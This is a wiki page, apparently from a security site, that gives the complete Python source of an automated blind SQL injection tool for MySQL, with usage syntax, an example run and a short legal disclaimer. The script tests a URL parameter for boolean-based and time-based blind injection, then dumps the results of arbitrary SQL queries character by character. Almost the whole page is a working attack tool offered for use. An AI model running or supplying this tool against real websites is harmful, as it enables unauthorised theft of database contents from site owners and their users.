Questions about this topic? Sign up to ask in the talk tab.
SQL injection/mysqli-blindutils/sqli-slee.py
From NetSec
Contents
Info
The syntax of this script is:
python bsqli.py -u [url] -i [injection]
Example
python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"
Disclaimer
The end-user is liable for his-or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act. |
Source
#!/usr/bin/python2.7 import sys,re,urllib,urllib2,string,time from optparse import OptionParser from urllib2 import Request,urlopen,URLError,HTTPError def request(URL): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req) except HTTPError, e: print('[!] The server couldnt fulfill the request.') print('[!] Error code: ' + str(e.code)) sys.exit(1) except URLError, e: print('[!] We failed to reach a server.') print('[!] Reason: ' + str(e.reason)) sys.exit(1) return len(request.read()) def value(URL): target = 0 end = 0 next_maybe = 0 floor = 0 ceiling = 255 maybe = int(ceiling)/2 while(end != 9): if(is_what(URL, maybe, '>')): floor = maybe next_maybe = int(maybe + ((ceiling - floor)/2)) elif(is_what(URL, maybe, '<')): ceiling = maybe next_maybe = int(maybe - ((ceiling - floor)/2)) elif(is_what(URL, maybe, '=')): return chr(maybe) maybe = next_maybe end += 1 return 'done' def is_what(URL, maybe, op): if(sqli_type == 'boolean'): ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+')) if(TrueResponse == ValueResponse): return 1 else: return 0 elif(sqli_type == 'time'): start = time.time() ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+') elapsed_time = (time.time() - start) if (elapsed_time > 2): return 1 else: return 0 def vuln_check(URL): print('[+] Checking site...') global TrueResponse TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+')) FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+')) if(TrueResponse != FalseResponse): print('[+] Site seems to be vulnerable to boolean based blind SQL injection.') return 'boolean' else: start = time.time() SleepResponse = request(URL + '%20and%20sleep(5)--+') elapsed_time = (time.time() - start) if(elapsed_time > 5): print('[+] Site seems to be vulnerable to time based blind SQL injection.') return 'time' else: print('[!] Seems like site isnt vulnerable to blind SQL injection.') sys.exit(1) def main(): print(''' Auto BSQLi tool for MySQL ''') usage = 'usage: %prog -u <target> -i <injection>' parser = OptionParser(usage=usage) parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"') parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"') (options, args) = parser.parse_args() if(options.URL and options.INJECTION): URL = options.URL INJECTION = urllib2.quote(options.INJECTION.encode("utf8")) else: print('[!] Missing url or injection parameter.') print('[!] Use --help.') sys.exit(1) global sqli_type sqli_type = vuln_check(URL) position = 1 dump = '' print('[+] Dumping data...') while(1): if(sqli_type == 'boolean'): letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))') elif(sqli_type == 'time'): letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))') if(letter == 'done'): break dump = dump + letter position += 1 if(dump): print('[+] Data: ' + dump) else: print('[!] No data dumped. Check your injection.') if __name__ == "__main__": main() |